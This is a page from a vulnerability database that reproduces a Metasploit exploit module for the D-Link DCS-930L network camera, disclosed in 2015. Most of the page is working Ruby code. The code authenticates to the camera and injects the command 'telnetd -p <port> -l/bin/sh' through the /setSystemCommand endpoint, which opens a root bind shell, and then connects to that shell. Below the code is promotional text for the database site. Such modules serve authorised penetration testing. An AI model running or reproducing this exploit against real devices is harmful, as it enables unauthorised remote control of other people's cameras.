Lucene search
K

D-Link DCS-930L - Authenticated Remote Command Execution (Metasploit)

🗓️ 10 Feb 2016 00:00:00Reported by metasploitType 
zdt
 zdt
🔗 0day.today👁 18 Views

D-Link DCS-930L Network Video Camera OS Command Injection via web interface, firmware v2.01 to 2.1

Code
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
  include Msf::Exploit::Remote::Telnet
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link DCS-930L Authenticated Remote Command Execution',
      'Description' => %q{
        The D-Link DCS-930L Network Video Camera is vulnerable
        to OS Command Injection via the web interface.  The vulnerability
        exists at /setSystemCommand, which is accessible with credentials.
        This vulnerability was present in firmware version 2.01 and fixed
        by 2.12.
      },
      'Author'      =>
        [
          'Nicholas Starke <[email protected]>'
        ],
      'License'         => MSF_LICENSE,
      'DisclosureDate'  => 'Dec 20 2015',
      'Privileged'      => true,
      'Platform'        => 'unix',
      'Arch'            => ARCH_CMD,
      'Payload'         =>
        {
          'Compat'  => {
          'PayloadType'    => 'cmd_interact',
          'ConnectionType' => 'find',
          },
        },
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
      'Targets'        =>
        [
          [  'Automatic',     { } ],
        ],
      'DefaultTarget'  => 0
     ))
 
    register_options(
      [
        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
        OptString.new('PASSWORD', [ false, 'Password to login with', ''])
      ], self.class)
 
    register_advanced_options(
      [
        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet Command', 10]),
        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
      ], self.class)
  end
 
  def telnet_timeout
    (datastore['TelnetTimeout'] || 10)
  end
 
  def banner_timeout
    (datastore['TelnetBannerTimeout'] || 25)
  end
 
  def exploit
    user = datastore['USERNAME']
    pass = datastore['PASSWORD'] || ''
 
    test_login(user, pass)
    exploit_telnet
  end
 
  def test_login(user, pass)
    print_status("#{peer} - Trying to login with #{user} : #{pass}")
 
    res = send_request_cgi({
      'uri' => '/',
      'method' => 'GET',
      'authorization' => basic_auth(user, pass)
    })
 
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") if res.code != 200
 
    print_good("#{peer} - Successful login #{user} : #{pass}")
  end
 
  def exploit_telnet
    telnet_port = rand(32767) + 32768
 
    print_status("#{peer} - Telnet Port: #{telnet_port}")
 
    cmd = "telnetd -p #{telnet_port} -l/bin/sh"
 
    telnet_request(cmd)
 
    print_status("#{rhost}:#{telnet_port} - Trying to establish telnet connection...")
    ctx = { 'Msf' => framework, 'MsfExploit' => self }
    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => telnet_timeout })
 
    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor service unreachable")
    end
 
    add_socket(sock)
 
    print_status("#{rhost}:#{telnet_port} - Trying to establish a telnet session...")
    prompt = negotiate_telnet(sock)
 
    if prompt.nil?
      sock.close
      fail_with(Failure::Unknown, "#{rhost}:#{telnet_port} - Unable to establish a telnet session")
    else
      print_good("#{rhost}:#{telnet_port} - Telnet session successfully established")
    end
 
    handler(sock)
  end
 
  def telnet_request(cmd)
    uri = '/setSystemCommand'
 
    begin
      res = send_request_cgi({
        'uri' => uri,
        'method' => 'POST',
        'vars_post' => {
          'ReplySuccessPage' => 'docmd.htm',
          'ReplyErrorPage' => 'docmd.htm',
          'SystemCommand'  => cmd,
          'ConfigSystemCommand' => 'Save'
        }
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
 
  def negotiate_telnet(sock)
    begin
      Timeout.timeout(banner_timeout) do
        while(true)
          data = sock.get_once(-1, telnet_timeout)
          return nil if not data or data.length == 0
          if data =~ /BusyBox/
            return true
          end
        end
      end
    rescue ::Timeout::Error
      return nil
    end
  end
end

#  0day.today [2018-01-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Feb 2016 00:00Current
7.1High risk
Vulners AI Score7.1
18